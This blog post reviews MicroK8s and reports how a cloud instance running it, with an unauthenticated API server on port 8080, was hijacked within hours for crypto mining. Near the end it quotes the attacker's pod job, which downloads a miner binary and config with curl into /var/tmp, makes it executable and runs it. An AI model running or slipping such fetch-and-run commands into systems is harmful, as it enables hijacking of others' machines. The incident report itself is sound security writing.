An overview of MicroK8s (a tool to quick-start a Kubernetes cluster) and why using it in the cloud was a terrible idea

At KubeCon Seattle this year, Canonical (the company behind Ubuntu) was giving out T-shirts for trying out MicroK8s, their tool for provisioning a Kubernetes (K8s for short) cluster.

microk8s provides a single-command installation of the latest Kubernetes release on a local machine for development and testing. Setup is quick (~30 seconds) and supports many add-ons, including Istio, each enabled with a single command.

Since K8s is not the easiest thing to get started with, having a tool that would make it easy for you to get going is very desirable. I was excited to try it out and I wanted a 👕 as well.

The microk8s claim:

Single node Kubernetes done right
Zero-ops k8s on just about any Linux box.
It’s not elastic, but it is on rails. Use it for offline development, prototyping, testing, or use it on a VM as a small, cheap, reliable k8s for CI/CD. Makes a great k8s for appliances — develop your IoT apps for k8s and deploy them to MicroK8s on your boxes.

Both minikube and microk8s can spin up a single-node K8s cluster for you. There are a few important differences, though.

minikube is VM-based and is generally aimed at macOS and Windows users. On Linux, it can provision a K8s instance with or without a VM. However, running minikube outside of a VM is very much not recommended, as it can damage the host system.

microk8s is strictly for Linux. There is no VM involved. It is distributed and runs as a snap — a pre-packaged application (similar to a Docker container). Snaps can be used on all major Linux distributions, including Ubuntu, Linux Mint, Debian and Fedora.

To try microk8s I first needed a Linux box.

The easiest and quickest option to get one up was spinning up a DigitalOcean “droplet” in the cloud with Ubuntu 18.04.

microk8s installation was indeed quick and painless:

sudo snap install microk8s --classic

microk8s comes with a set of tools:

microk8s.config    microk8s.docker    microk8s.inspect   microk8s.kubectl   microk8s.start     microk8s.stop
microk8s.disable   microk8s.enable    microk8s.istioctl  microk8s.reset     microk8s.status

microk8s.start and microk8s.stop do what you’d expect — start/stop your K8s cluster.

microk8s.status is a little less intuitive, as it shows the status of the add-ons rather than the cluster itself. Use it alongside microk8s.enable and microk8s.disable to control add-ons:

$ microk8s.status
microk8s is running
gpu: disabled
storage: enabled
registry: enabled
ingress: enabled
dns: disabled
metrics-server: disabled
istio: disabled
dashboard: disabled
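For example, turning add-ons on and off looks something like this (a sketch; dns and dashboard are just two of the add-on names from the status output above):

```shell
# Enable the DNS and dashboard add-ons:
microk8s.enable dns dashboard

# Turn an add-on back off:
microk8s.disable dashboard
```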

To see the actual microk8s cluster status, use microk8s.inspect:

Inspecting services
Service snap.microk8s.daemon-docker is running
Service snap.microk8s.daemon-apiserver is running
Service snap.microk8s.daemon-proxy is running
Service snap.microk8s.daemon-kubelet is running
Service snap.microk8s.daemon-scheduler is running
Service snap.microk8s.daemon-controller-manager is running
Service snap.microk8s.daemon-etcd is running
Copy service arguments to the final report tarball
Inspecting AppArmor configuration
Gathering system info
Copy network configuration to the final report tarball
Copy processes list to the final report tarball
Copy snap list to the final report tarball
Inspect kubernetes cluster

WARNING: IPtables FORWARD policy is DROP. Consider enabling traffic forwarding with: sudo iptables -P FORWARD ACCEPT
Building the report tarball
Report tarball is at /var/snap/microk8s/340/inspection-report-20181217_015503.tar.gz

microk8s.docker can be used to talk to the Docker daemon:

$ microk8s.docker version
Client:
 Version:      17.03.2-ce
 API version:  1.27
 Go version:   go1.6.2
 Git commit:   f5ec1e2
 Built:        Thu Jul 5 23:07:48 2018
 OS/Arch:      linux/amd64

Server:
 Version:      17.03.2-ce
 API version:  1.27 (minimum version 1.12)
 Go version:   go1.6.2
 Git commit:   f5ec1e2
 Built:        Thu Jul 5 23:07:48 2018
 OS/Arch:      linux/amd64
 Experimental: false

The 17.03.2-ce Docker version was released on 2017-05-29. I have no idea why microk8s sticks with a Docker release that is more than 1.5 years old.

Update: Since this was brought up in the comments, I found a relevant issue on GitHub. Apparently, the Docker version in microk8s depends on the underlying Ubuntu version the snap is built on. An update is in the works: the edge version of the microk8s snap is built with Ubuntu Core 18 and ships Docker 18.06:

sudo snap install microk8s --classic --edge

microk8s.istioctl is used to control Istio (a very powerful and complex service mesh implementation — totally out of scope for this post), which can be enabled as an add-on via microk8s.enable istio.

microk8s.kubectl is a wrapper around kubectl — the cluster manager tool for Kubernetes:

$ microk8s.kubectl cluster-info
Kubernetes master is running at
$ microk8s.kubectl get nodes
ubuntu-s-4vcpu-8gb-sfo2-01 Ready <none> 4d6h v1.13.0
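Since it wraps the regular kubectl, any standard subcommand works through it. A quick smoke test might look like this (the deployment name and image are just examples):

```shell
# Create a throwaway deployment and check that its pod comes up:
microk8s.kubectl create deployment hello --image=nginx
microk8s.kubectl get pods
```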

microk8s.config shows the client config that can be used to connect to your cluster, should you decide not to use microk8s.kubectl for that.

$ microk8s.config
apiVersion: v1
clusters:
- cluster:
  name: microk8s-cluster
contexts:
- context:
    cluster: microk8s-cluster
    user: admin
  name: microk8s
current-context: microk8s
kind: Config
preferences: {}
users:
- name: admin
  user:
    username: admin

There are several ways you can feed this client config to kubectl:

  • Write it to ~/.kube/config — the default configuration location
  • Pass it as a parameter to kubectl (every time)
    kubectl --kubeconfig=./client-config ...
  • Export it via the environment variable (once per terminal session)
    export KUBECONFIG=/absolute/path/to/client-config
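The first option can be done in a single line, assuming a standard kubectl setup and no existing config you care about (this overwrites ~/.kube/config):

```shell
# Write the microk8s client config to kubectl's default location:
microk8s.config > ~/.kube/config
```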

Once the config is in place (using either method), check the cluster info:

$ kubectl --kubeconfig=./do-k8s-config.yaml cluster-info
Kubernetes master is running at
To further debug and diagnose cluster problems, use 'kubectl cluster-info dump'.
$ kubectl --kubeconfig=./do-k8s-config.yaml get nodes
ubuntu-s-4vcpu-8gb-sfo2-01 Ready <none> 4d7h v1.13.0

At this point, the more experienced Kubernetes folks have figured out why it was a bad idea to play with microk8s in the cloud.

My microk8s cluster playground was totally unprotected and open to the whole world!

This detail is only vaguely mentioned in the README of the microk8s repo and is definitely not obvious, especially to novice users.

Note: The API server on port 8080 is listening on all network interfaces.
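If you do run microk8s on an internet-facing box, one way to reduce the exposure is a host firewall that only allows the API server port from networks you trust. A rough sketch with ufw (assumes ufw is available; the 10.0.0.0/8 range is a placeholder for your own network):

```shell
# Drop inbound traffic by default, but keep SSH access:
sudo ufw default deny incoming
sudo ufw allow ssh

# Allow the API server port only from a trusted range (placeholder):
sudo ufw allow from 10.0.0.0/8 to any port 8080 proto tcp
sudo ufw enable
```

This is damage control, not a substitute for an API server that requires authentication.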

It took just a few hours for my microk8s-provisioned instance to be discovered, exploited, and put to work mining crypto:

[Screenshot: crypto mining pod fleet]
[Screenshot: inspecting one of the pods]

Here’s the actual job the pods were running:

curl -o /var/tmp/config.json;
curl -o /var/tmp/suppoie1;
chmod 777 /var/tmp/suppoie1;
cd /var/tmp;
./suppoie1 -c config.json

I saved the config.json in a gist if anyone wants a closer look.
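If you find yourself in the same situation, a rough cleanup sketch looks like this (the resource names below are placeholders; and since the box itself may be compromised, rebuilding it is the safer call):

```shell
# Find everything the attacker created:
microk8s.kubectl get all --all-namespaces

# Delete the offending workloads (names are placeholders):
microk8s.kubectl delete deployment <miner-deployment> --namespace <namespace>

# Or simply stop the cluster while you investigate:
microk8s.stop
```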

Apparently, this issue was already reported to the microk8s team back in September:

There is a PR in review to secure microk8s by default. I hope the microk8s team gets it merged and released soon.

Update: This article received a bunch of angry comments in /r/kubernetes/. Apparently, microk8s (in its current iteration) is not intended to be used outside a local/locked-down environment. Now you also know what’s going to happen if you do (accidentally or intentionally) use it in the public cloud 😄. It was a fun and useful experiment anyway, and I learned from it.

I hope you found this article useful. Help others discover it on Medium by giving it some claps 👏 (the more — the merrier 😃) . Thanks for reading!